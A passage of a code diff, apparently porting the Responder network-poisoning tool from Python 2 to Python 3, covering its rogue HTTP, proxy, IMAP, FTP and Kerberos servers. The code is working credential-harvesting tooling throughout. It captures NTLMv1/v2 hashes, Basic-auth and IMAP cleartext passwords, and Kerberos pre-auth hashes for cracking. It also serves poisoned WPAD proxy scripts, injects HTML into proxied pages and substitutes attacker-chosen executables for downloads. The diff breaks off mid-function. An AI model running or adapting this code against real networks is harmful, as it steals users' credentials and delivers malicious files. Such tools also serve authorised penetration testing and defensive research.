@@ -49,7 +53,7 @@ class FTP(BaseRequestHandler):

 			else:
 				Packet = FTPPacket(Code="502",Message="Command not implemented.")
-				self.request.send(str(Packet))
+				self.request.send(NetworkSendBufferPython2or3(Packet))
 				data = self.request.recv(1024)

 		except Exception:
--- a/servers/HTTP.py
+++ b/servers/HTTP.py
@@ -14,42 +14,46 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from SocketServer import BaseRequestHandler, StreamRequestHandler
-from base64 import b64decode
 import struct
+import codecs
 from utils import *
-
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler, StreamRequestHandler
+else:
+	from SocketServer import BaseRequestHandler, StreamRequestHandler
+from base64 import b64decode, b64encode
 from packets import NTLM_Challenge
-from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans
+from packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans,WEBDAV_Options_Answer
 from packets import WPADScript, ServeExeFile, ServeHtmlFile


 # Parse NTLMv1/v2 hash.
-def ParseHTTPHash(data, client, module):
+def ParseHTTPHash(data, Challenge, client, module):
 	LMhashLen    = struct.unpack('<H',data[12:14])[0]
 	LMhashOffset = struct.unpack('<H',data[16:18])[0]
-	LMHash       = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
+	LMHash       = data[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHashFinal  = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
 	
 	NthashLen    = struct.unpack('<H',data[20:22])[0]
 	NthashOffset = struct.unpack('<H',data[24:26])[0]
-	NTHash       = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-	
+	NTHash       = data[NthashOffset:NthashOffset+NthashLen]
+	NTHashFinal  = codecs.encode(NTHash, 'hex').upper().decode('latin-1')
 	UserLen      = struct.unpack('<H',data[36:38])[0]
 	UserOffset   = struct.unpack('<H',data[40:42])[0]
-	User         = data[UserOffset:UserOffset+UserLen].replace('\x00','')
-
+	User         = data[UserOffset:UserOffset+UserLen].decode('latin-1').replace('\x00','')
+	Challenge1    = codecs.encode(Challenge,'hex').decode('latin-1')
 	if NthashLen == 24:
 		HostNameLen     = struct.unpack('<H',data[46:48])[0]
 		HostNameOffset  = struct.unpack('<H',data[48:50])[0]
-		HostName        = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
-		WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, settings.Config.NumChal)
+		HostName        = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
+		WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHashFinal, NTHashFinal, Challenge1)
 		SaveToDb({
 			'module': module, 
 			'type': 'NTLMv1', 
 			'client': client, 
 			'host': HostName, 
 			'user': User, 
-			'hash': LMHash+":"+NTHash, 
+			'hash': LMHashFinal+':'+NTHashFinal, 
 			'fullhash': WriteHash,
 		})

@@ -57,19 +61,18 @@ def ParseHTTPHash(data, client, module):
 		NthashLen      = 64
 		DomainLen      = struct.unpack('<H',data[28:30])[0]
 		DomainOffset   = struct.unpack('<H',data[32:34])[0]
-		Domain         = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+		Domain         = data[DomainOffset:DomainOffset+DomainLen].decode('latin-1').replace('\x00','')
 		HostNameLen    = struct.unpack('<H',data[44:46])[0]
 		HostNameOffset = struct.unpack('<H',data[48:50])[0]
-		HostName       = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
-		WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
-                 
+		HostName       = data[HostNameOffset:HostNameOffset+HostNameLen].decode('latin-1').replace('\x00','')
+		WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, Challenge1, NTHashFinal[:32], NTHashFinal[32:])
 		SaveToDb({
 			'module': module, 
 			'type': 'NTLMv2', 
 			'client': client, 
 			'host': HostName, 
 			'user': Domain + '\\' + User,
-			'hash': NTHash[:32] + ":" + NTHash[32:],
+			'hash': NTHashFinal[:32] + ':' + NTHashFinal[32:],
 			'fullhash': WriteHash,
 		})

@@ -79,7 +82,7 @@ def GrabCookie(data, host):
 	if Cookie:
 		Cookie = Cookie.group(0).replace('Cookie: ', '')
 		if len(Cookie) > 1 and settings.Config.Verbose:
-			print text("[HTTP] Cookie           : %s " % Cookie)
+			print(text("[HTTP] Cookie           : %s " % Cookie))
 		return Cookie
 	return False

@@ -89,7 +92,7 @@ def GrabHost(data, host):
 	if Host:
 		Host = Host.group(0).replace('Host: ', '')
 		if settings.Config.Verbose:
-			print text("[HTTP] Host             : %s " % color(Host, 3))
+			print(text("[HTTP] Host             : %s " % color(Host, 3)))
 		return Host
 	return False

@@ -99,31 +102,62 @@ def GrabReferer(data, host):
 	if Referer:
 		Referer = Referer.group(0).replace('Referer: ', '')
 		if settings.Config.Verbose:
-			print text("[HTTP] Referer         : %s " % color(Referer, 3))
+			print(text("[HTTP] Referer         : %s " % color(Referer, 3)))
 		return Referer
 	return False

+def SpotFirefox(data):
+	UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
+	if UserAgent:
+		print(text("[HTTP] %s" % color("User-Agent        : "+UserAgent[0], 2)))
+		IsFirefox = re.search('Firefox', UserAgent[0])
+		if IsFirefox:
+			print(color("[WARNING]: Mozilla doesn't switch to fail-over proxies (as it should) when one's failing.", 1))
+			print(color("[WARNING]: The current WPAD script will cause disruption on this host. Sending a dummy wpad script (DIRECT connect)", 1))
+			return True
+		else:
+			return False
+
 def WpadCustom(data, client):
 	Wpad = re.search(r'(/wpad.dat|/*\.pac)', data)
-	if Wpad:
+	if Wpad and SpotFirefox(data):
+		Buffer = WPADScript(Payload="function FindProxyForURL(url, host){return 'DIRECT';}")
+		Buffer.calculate()
+		return str(Buffer)
+
+	if Wpad and SpotFirefox(data) == False:
 		Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
 		Buffer.calculate()
 		return str(Buffer)
 	return False

+def IsWebDAV(data):
+        dav = re.search('PROPFIND', data)
+        if dav:
+              return True
+        else:
+              return False
+
+def ServeOPTIONS(data):
+	WebDav= re.search('OPTIONS', data)
+	if WebDav:
+		Buffer = WEBDAV_Options_Answer()
+		return str(Buffer)
+
+	return False
+
 def ServeFile(Filename):
 	with open (Filename, "rb") as bk:
-		return bk.read()
+		return NetworkRecvBufferPython2or3(bk.read())

 def RespondWithFile(client, filename, dlname=None):
-	
 	if filename.endswith('.exe'):
 		Buffer = ServeExeFile(Payload = ServeFile(filename), ContentDiFile=dlname)
 	else:
 		Buffer = ServeHtmlFile(Payload = ServeFile(filename))

 	Buffer.calculate()
-	print text("[HTTP] Sending file %s to %s" % (filename, client))
+	print(text("[HTTP] Sending file %s to %s" % (filename, client)))
 	return str(Buffer)

 def GrabURL(data, host):
@@ -132,16 +166,16 @@ def GrabURL(data, host):
 	POSTDATA = re.findall(r'(?<=\r\n\r\n)[^*]*', data)

 	if GET and settings.Config.Verbose:
-		print text("[HTTP] GET request from: %-15s  URL: %s" % (host, color(''.join(GET), 5)))
+		print(text("[HTTP] GET request from: %-15s  URL: %s" % (host, color(''.join(GET), 5))))

 	if POST and settings.Config.Verbose:
-		print text("[HTTP] POST request from: %-15s  URL: %s" % (host, color(''.join(POST), 5)))
+		print(text("[HTTP] POST request from: %-15s  URL: %s" % (host, color(''.join(POST), 5))))

 		if len(''.join(POSTDATA)) > 2:
-			print text("[HTTP] POST Data: %s" % ''.join(POSTDATA).strip())
+			print(text("[HTTP] POST Data: %s" % ''.join(POSTDATA).strip()))

 # Handle HTTP packet sequence.
-def PacketSequence(data, client):
+def PacketSequence(data, client, Challenge):
 	NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
 	Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)

@@ -154,36 +188,41 @@ def PacketSequence(data, client):
 		return RespondWithFile(client, settings.Config.Html_Filename)

 	WPAD_Custom = WpadCustom(data, client)
-	
+        # Webdav
+	if ServeOPTIONS(data):
+		return ServeOPTIONS(data)
+
 	if NTLM_Auth:
 		Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
-
-		if Packet_NTLM == "\x01":
+		if Packet_NTLM == b'\x01':
 			GrabURL(data, client)
 			GrabReferer(data, client)
 			GrabHost(data, client)
 			GrabCookie(data, client)

-			Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
+			Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 			Buffer.calculate()

-			Buffer_Ans = IIS_NTLM_Challenge_Ans()
-			Buffer_Ans.calculate(str(Buffer))
+			Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+			#Buffer_Ans.calculate(Buffer)
+			return Buffer_Ans

-			return str(Buffer_Ans)
-
-		if Packet_NTLM == "\x03":
+		if Packet_NTLM == b'\x03':
 			NTLM_Auth = b64decode(''.join(NTLM_Auth))
-			ParseHTTPHash(NTLM_Auth, client, "HTTP")
+			if IsWebDAV(data):
+                                 module = "WebDAV"
+			else:
+                                 module = "HTTP"
+			ParseHTTPHash(NTLM_Auth, Challenge, client, module)

 			if settings.Config.Force_WPAD_Auth and WPAD_Custom:
-				print text("[HTTP] WPAD (auth) file sent to %s" % client)
+				print(text("[HTTP] WPAD (auth) file sent to %s" % client))

 				return WPAD_Custom
 			else:
 				Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
 				Buffer.calculate()
-				return str(Buffer)
+				return Buffer

 	elif Basic_Auth:
 		ClearText_Auth = b64decode(''.join(Basic_Auth))
@@ -197,72 +236,78 @@ def PacketSequence(data, client):
 			'module': 'HTTP', 
 			'type': 'Basic', 
 			'client': client, 
-			'user': ClearText_Auth.split(':')[0], 
-			'cleartext': ClearText_Auth.split(':')[1], 
-		})
+			'user': ClearText_Auth.decode('latin-1').split(':')[0], 
+			'cleartext': ClearText_Auth.decode('latin-1').split(':')[1], 
+			})

 		if settings.Config.Force_WPAD_Auth and WPAD_Custom:
 			if settings.Config.Verbose:
-				print text("[HTTP] WPAD (auth) file sent to %s" % client)
+				print(text("[HTTP] WPAD (auth) file sent to %s" % client))

 			return WPAD_Custom
 		else:
 			Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
 			Buffer.calculate()
-			return str(Buffer)
+			return Buffer
 	else:
 		if settings.Config.Basic:
 			Response = IIS_Basic_401_Ans()
 			if settings.Config.Verbose:
-				print text("[HTTP] Sending BASIC authentication request to %s" % client)
+				print(text("[HTTP] Sending BASIC authentication request to %s" % client))

 		else:
 			Response = IIS_Auth_401_Ans()
 			if settings.Config.Verbose:
-				print text("[HTTP] Sending NTLM authentication request to %s" % client)
+				print(text("[HTTP] Sending NTLM authentication request to %s" % client))

-		return str(Response)
+		return Response

 # HTTP Server class
 class HTTP(BaseRequestHandler):
-	def handle(self):
-		try:
-			self.request.settimeout(1)
-			data = self.request.recv(8092)
-			Buffer = WpadCustom(data, self.client_address[0])
-
-			if Buffer and settings.Config.Force_WPAD_Auth == False:
-				self.request.send(Buffer)
-				if settings.Config.Verbose:
-					print text("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0])
-
-			else:
-				Buffer = PacketSequence(data,self.client_address[0])
-				self.request.send(Buffer)
-		except socket.error:
-			pass
-
-# HTTPS Server class
-class HTTPS(StreamRequestHandler):
-	def setup(self):
-		self.exchange = self.request
-		self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
-		self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)

 	def handle(self):
 		try:
-			data = self.exchange.recv(8092)
-			self.exchange.settimeout(0.5)
-			Buffer = WpadCustom(data,self.client_address[0])
-				
-			if Buffer and settings.Config.Force_WPAD_Auth == False:
-				self.exchange.send(Buffer)
-				if settings.Config.Verbose:
-					print text("[HTTPS] WPAD (no auth) file sent to %s" % self.client_address[0])
+			Challenge = RandomChallenge()
+			while True:
+				self.request.settimeout(3)
+				remaining = 10*1024*1024 #setting max recieve size
+				data = ''
+				while True:
+					buff = ''
+					buff = NetworkRecvBufferPython2or3(self.request.recv(8092))
+					if buff == '':
+						break
+					data += buff
+					remaining -= len(buff)
+					#check if we recieved the full header
+					if data.find('\r\n\r\n') != -1: 
+						#we did, now to check if there was anything else in the request besides the header
+						if data.find('Content-Length') == -1:
+							#request contains only header
+							break
+						else:
+							#searching for that content-length field in the header
+							for line in data.split('\r\n'):
+								if line.find('Content-Length') != -1:
+									line = line.strip()
+									remaining = int(line.split(':')[1].strip()) - len(data)
+					if remaining <= 0:
+						break
+				if data == "":
+					break
+				#now the data variable has the full request
+				Buffer = WpadCustom(data, self.client_address[0])

-			else:
-				Buffer = PacketSequence(data,self.client_address[0])
-				self.exchange.send(Buffer)
+				if Buffer and settings.Config.Force_WPAD_Auth == False:
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
+					self.request.close()
+					if settings.Config.Verbose:
+						print(text("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0]))
+
+				else:
+					Buffer = PacketSequence(data,self.client_address[0], Challenge)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
+		
 		except:
 			pass
-
+			
--- a/servers/HTTP_Proxy.py
+++ b/servers/HTTP_Proxy.py
@@ -14,13 +14,18 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import urlparse
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	import urllib.parse as urlparse
+	import http.server as BaseHTTPServer
+else:
+	import urlparse
+	import BaseHTTPServer
+
 import select
 import zlib
-import BaseHTTPServer
-
 from servers.HTTP import RespondWithFile
-from utils import *
+

 IgnoredDomains = [ 'crl.comodoca.com', 'crl.usertrust.com', 'ocsp.comodoca.com', 'ocsp.usertrust.com', 'www.download.windowsupdate.com', 'crl.microsoft.com' ]

@@ -34,9 +39,9 @@ def InjectData(data, client, req_uri):
 	if settings.Config.Serve_Exe == True and req_uri.endswith('.exe'):
 		return RespondWithFile(client, settings.Config.Exe_Filename, os.path.basename(req_uri))

-	if len(data.split('\r\n\r\n')) > 1:
+	if len(data.split(b'\r\n\r\n')) > 1:
 		try:
-			Headers, Content = data.split('\r\n\r\n')
+			Headers, Content = data.split(b'\r\n\r\n')
 		except:
 			return data

@@ -44,30 +49,34 @@ def InjectData(data, client, req_uri):
 		if set(RedirectCodes) & set(Headers):
 			return data

-		if "content-encoding: gzip" in Headers.lower():
+		Len = b''.join(re.findall(b'(?<=Content-Length: )[^\r\n]*', Headers))
+
+		if b'content-encoding: gzip' in Headers.lower():
 			Content = zlib.decompress(Content, 16+zlib.MAX_WBITS)

-		if "content-type: text/html" in Headers.lower():
+		if b'content-type: text/html' in Headers.lower():
 			if settings.Config.Serve_Html:  # Serve the custom HTML if needed
 				return RespondWithFile(client, settings.Config.Html_Filename)

-			Len = ''.join(re.findall(r'(?<=Content-Length: )[^\r\n]*', Headers))
-			HasBody = re.findall(r'(<body[^>]*>)', Content)

-			if HasBody and len(settings.Config.HtmlToInject) > 2:
+			HasBody = re.findall(b'(<body[^>]*>)', Content, re.IGNORECASE)
+
+			if HasBody and len(settings.Config.HtmlToInject) > 2 and not req_uri.endswith('.js'):
 				if settings.Config.Verbose:
-					print text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HtmlToInject, 3, 1))
+					print(text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HtmlToInject, 3, 1)))

-				Content = Content.replace(HasBody[0], '%s\n%s' % (HasBody[0], settings.Config.HtmlToInject))
+				Content = Content.replace(HasBody[0], b'%s\n%s' % (HasBody[0], settings.Config.HtmlToInject.encode('latin-1')))

-		if "content-encoding: gzip" in Headers.lower():
+		if b'content-encoding: gzip' in Headers.lower():
 			Content = zlib.compress(Content)

-		Headers = Headers.replace("Content-Length: "+Len, "Content-Length: "+ str(len(Content)))
-		data = Headers +'\r\n\r\n'+ Content
+		Headers = Headers.replace(b'Content-Length: '+Len, b'Content-Length: '+ NetworkSendBufferPython2or3(len(Content)))
+		data = Headers +b'\r\n\r\n'+ Content
+
 	else:
 		if settings.Config.Verbose:
-			print text("[PROXY] Returning unmodified HTTP response")
+			print(text("[PROXY] Returning unmodified HTTP response"))
+
 	return data

 class ProxySock:
@@ -99,14 +108,14 @@ class ProxySock:
 				# Replace the socket by a connection to the proxy
 				self.socket = socket.socket(family, socktype, proto)
 				self.socket.connect(sockaddr)
-			except socket.error, msg:
+			except socket.error as msg:
 				if self.socket:
 					self.socket.close()
 				self.socket = None
 				continue
 			break
 		if not self.socket :
-			raise socket.error, msg
+			raise socket.error(msg)
 		
 		# Ask him to create a tunnel connection to the target host/port
 		self.socket.send(
@@ -121,7 +130,7 @@ class ProxySock:
 		
 		# Not 200 ?
 		if parts[1] != "200":
-			print color("[!] Error response from upstream proxy: %s" % resp, 1)
+			print(color("[!] Error response from upstream proxy: %s" % resp, 1))
 			pass

 	# Wrap all methods of inner socket, without any change
@@ -200,7 +209,7 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 	def handle(self):
 		(ip, port) =  self.client_address
 		if settings.Config.Verbose:
-			print text("[PROXY] Received connection from %s" % self.client_address[0])
+			print(text("[PROXY] Received connection from %s" % self.client_address[0]))
 		self.__base_handle()

 	def _connect_to(self, netloc, soc):
@@ -210,7 +219,7 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 		else:
 			host_port = netloc, 80
 		try: soc.connect(host_port)
-		except socket.error, arg:
+		except socket.error as arg:
 			try: msg = arg[1]
 			except: msg = arg
 			self.send_error(404, msg)
@@ -271,14 +280,14 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 			URL_Unparse = urlparse.urlunparse(('', '', path, params, query, ''))

 			if self._connect_to(netloc, soc):
-				soc.send("%s %s %s\r\n" % (self.command, URL_Unparse, self.request_version))
+				soc.send(NetworkSendBufferPython2or3("%s %s %s\r\n" % (self.command, URL_Unparse, self.request_version)))

 				Cookie = self.headers['Cookie'] if "Cookie" in self.headers else ''

 				if settings.Config.Verbose:
-					print text("[PROXY] Client        : %s" % color(self.client_address[0], 3))
-					print text("[PROXY] Requested URL : %s" % color(self.path, 3))
-					print text("[PROXY] Cookie        : %s" % Cookie)
+					print(text("[PROXY] Client        : %s" % color(self.client_address[0], 3)))
+					print(text("[PROXY] Requested URL : %s" % color(self.path, 3)))
+					print(text("[PROXY] Cookie        : %s" % Cookie))

 				self.headers['Connection'] = 'close'
 				del self.headers['Proxy-Connection']
@@ -286,8 +295,8 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 				del self.headers['Range']
 				
 				for k, v in self.headers.items():
-					soc.send("%s: %s\r\n" % (k.title(), v))
-				soc.send("\r\n")
+					soc.send(NetworkSendBufferPython2or3("%s: %s\r\n" % (k.title(), v)))
+				soc.send(NetworkSendBufferPython2or3("\r\n"))

 				try:
 					self._read_write(soc, netloc)
@@ -325,13 +334,14 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
 						try:
 							data = i.recv(4096)

-							if self.command == "POST" and settings.Config.Verbose:
-								print text("[PROXY] POST Data     : %s" % data)
+							if self.command == b'POST' and settings.Config.Verbose:
+								print(text("[PROXY] POST Data     : %s" % data))
 						except:
 							pass
 					if data:
 						try:
 							out.send(data)
+
 							count = 0
 						except:
 							pass
--- a/servers/IMAP.py
+++ b/servers/IMAP.py
@@ -14,36 +14,35 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sys
 from utils import *
-from SocketServer import BaseRequestHandler
+if (sys.version_info > (3, 0)):
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 from packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd

 class IMAP(BaseRequestHandler):
 	def handle(self):
 		try:
-			self.request.send(str(IMAPGreeting()))
+			self.request.send(NetworkSendBufferPython2or3(IMAPGreeting()))
 			data = self.request.recv(1024)
-
-			if data[5:15] == "CAPABILITY":
+			if data[5:15] == b'CAPABILITY':
 				RequestTag = data[0:4]
-				self.request.send(str(IMAPCapability()))
-				self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag)))
+				self.request.send(NetworkSendBufferPython2or3(IMAPCapability()))
+				self.request.send(NetworkSendBufferPython2or3(IMAPCapabilityEnd(Tag=RequestTag.decode("latin-1"))))
 				data = self.request.recv(1024)

-			if data[5:10] == "LOGIN":
-				Credentials = data[10:].strip()
-
+			if data[5:10] == b'LOGIN':
+				Credentials = data[10:].strip().decode("latin-1").split('"')
 				SaveToDb({
 					'module': 'IMAP', 
 					'type': 'Cleartext', 
 					'client': self.client_address[0], 
-					'user': Credentials[0], 
-					'cleartext': Credentials[1], 
-					'fullhash': Credentials[0]+":"+Credentials[1],
+					'user': Credentials[1], 
+					'cleartext': Credentials[3], 
+					'fullhash': Credentials[1]+":"+Credentials[3],
 				})

-				## FIXME: Close connection properly
-				## self.request.send(str(ditchthisconnection()))
-				## data = self.request.recv(1024)
 		except Exception:
 			pass
--- a/servers/Kerberos.py
+++ b/servers/Kerberos.py
@@ -14,56 +14,61 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from SocketServer import BaseRequestHandler
-from utils import *
+import codecs
 import struct
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+

 def ParseMSKerbv5TCP(Data):
 	MsgType     = Data[21:22]
 	EncType     = Data[43:44]
 	MessageType = Data[32:33]

-	if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
-		if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
+	if MsgType == b'\x0a' and EncType == b'\x17' and MessageType ==b'\x02':
+		if Data[49:53] == b'\xa2\x36\x04\x34' or Data[49:53] == b'\xa2\x35\x04\x33':
 			HashLen = struct.unpack('<b',Data[50:51])[0]
 			if HashLen == 54:
 				Hash       = Data[53:105]
 				SwitchHash = Hash[16:]+Hash[0:16]
 				NameLen    = struct.unpack('<b',Data[153:154])[0]
-				Name       = Data[154:154+NameLen]
+				Name       = Data[154:154+NameLen].decode('latin-1')
 				DomainLen  = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
-				Domain     = Data[154+NameLen+4:154+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				Domain     = Data[154+NameLen+4:154+NameLen+4+DomainLen].decode('latin-1')
+				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
 				return BuildHash

-		if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
+		if Data[44:48] == b'\xa2\x36\x04\x34' or Data[44:48] == b'\xa2\x35\x04\x33':
 			HashLen = struct.unpack('<b',Data[45:46])[0]
 			if HashLen == 53:
 				Hash       = Data[48:99]
 				SwitchHash = Hash[16:]+Hash[0:16]
 				NameLen    = struct.unpack('<b',Data[147:148])[0]
-				Name       = Data[148:148+NameLen]
+				Name       = Data[148:148+NameLen].decode('latin-1')
 				DomainLen  = struct.unpack('<b',Data[148+NameLen+3:148+NameLen+4])[0]
-				Domain     = Data[148+NameLen+4:148+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				Domain     = Data[148+NameLen+4:148+NameLen+4+DomainLen].decode('latin-1')
+				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
 				return BuildHash
 			elif HashLen == 54:
 				Hash       = Data[53:105]
 				SwitchHash = Hash[16:]+Hash[0:16]
 				NameLen    = struct.unpack('<b',Data[148:149])[0]
-				Name       = Data[149:149+NameLen]
+				Name       = Data[149:149+NameLen].decode('latin-1')
 				DomainLen  = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
-				Domain     = Data[149+NameLen+4:149+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				Domain     = Data[149+NameLen+4:149+NameLen+4+DomainLen].decode('latin-1')
+				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
 				return BuildHash
 		else:
 			Hash       = Data[48:100]
 			SwitchHash = Hash[16:]+Hash[0:16]
 			NameLen    = struct.unpack('<b',Data[148:149])[0]
-			Name       = Data[149:149+NameLen]
+			Name       = Data[149:149+NameLen].decode('latin-1')
 			DomainLen  = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
-			Domain     = Data[149+NameLen+4:149+NameLen+4+DomainLen]
-			BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+			Domain     = Data[149+NameLen+4:149+NameLen+4+DomainLen].decode('latin-1')
+			BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
 			return BuildHash
 	return False

@@ -71,69 +76,74 @@ def ParseMSKerbv5UDP(Data):
 	MsgType = Data[17:18]
 	EncType = Data[39:40]

-	if MsgType == "\x0a" and EncType == "\x17":
-		if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
+	if MsgType == b'\x0a' and EncType == b'\x17':
+		if Data[40:44] == b'\xa2\x36\x04\x34' or Data[40:44] == b'\xa2\x35\x04\x33':
 			HashLen = struct.unpack('<b',Data[41:42])[0]
 			if HashLen == 54:
 				Hash       = Data[44:96]
 				SwitchHash = Hash[16:]+Hash[0:16]
 				NameLen    = struct.unpack('<b',Data[144:145])[0]
-				Name       = Data[145:145+NameLen]
+				Name       = Data[145:145+NameLen].decode('latin-1')
 				DomainLen  = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
-				Domain     = Data[145+NameLen+4:145+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				Domain     = Data[145+NameLen+4:145+NameLen+4+DomainLen].decode('latin-1')
+				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
 				return BuildHash
 			elif HashLen == 53:
 				Hash       = Data[44:95]
 				SwitchHash = Hash[16:]+Hash[0:16]
 				NameLen    = struct.unpack('<b',Data[143:144])[0]
-				Name       = Data[144:144+NameLen]
+				Name       = Data[144:144+NameLen].decode('latin-1')
 				DomainLen  = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
-				Domain     = Data[144+NameLen+4:144+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+				Domain     = Data[144+NameLen+4:144+NameLen+4+DomainLen].decode('latin-1')
+				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
 				return BuildHash
 		else:
 			Hash       = Data[49:101]
 			SwitchHash = Hash[16:]+Hash[0:16]
 			NameLen    = struct.unpack('<b',Data[149:150])[0]
-			Name       = Data[150:150+NameLen]
+			Name       = Data[150:150+NameLen].decode('latin-1')
 			DomainLen  = struct.unpack('<b',Data[150+NameLen+3:150+NameLen+4])[0]
-			Domain     = Data[150+NameLen+4:150+NameLen+4+DomainLen]
-			BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
+			Domain     = Data[150+NameLen+4:150+NameLen+4+DomainLen].decode('latin-1')
+			BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+codecs.encode(SwitchHash,'hex').decode('latin-1')
 			return BuildHash
 	return False

 class KerbTCP(BaseRequestHandler):
 	def handle(self):
-		data = self.request.recv(1024)
-		KerbHash = ParseMSKerbv5TCP(data)
+		try:
+			data = self.request.recv(1024)
+			KerbHash = ParseMSKerbv5TCP(data)

-		if KerbHash:
-			n, krb, v, name, domain, d, h = KerbHash.split('$')
+			if KerbHash:
+				n, krb, v, name, domain, d, h = KerbHash.split('$')

-			SaveToDb({
-				'module': 'KERB',
-				'type': 'MSKerbv5',
-				'client': self.client_address[0],
-				'user': domain+'\\'+name,
-				'hash': h,
-				'fullhash': KerbHash,
-			})
+				SaveToDb({
+					'module': 'KERB',
+					'type': 'MSKerbv5',
+					'client': self.client_address[0],
+					'user': domain+'\\'+name,
+					'hash': h,
+					'fullhash': KerbHash,
+				})
+		except:
+			pass

 class KerbUDP(BaseRequestHandler):
-
 	def handle(self):
-		data, soc = self.request
-		KerbHash = ParseMSKerbv5UDP(data)
+		try:
+			data, soc = self.request
+			KerbHash = ParseMSKerbv5UDP(data)

-		if KerbHash:
-			(n, krb, v, name, domain, d, h) = KerbHash.split('$')
+			if KerbHash:
+				(n, krb, v, name, domain, d, h) = KerbHash.split('$')

-			SaveToDb({
-				'module': 'KERB',
-				'type': 'MSKerbv5',
-				'client': self.client_address[0],
-				'user': domain+'\\'+name,
-				'hash': h,
-				'fullhash': KerbHash,
-			})
+				SaveToDb({
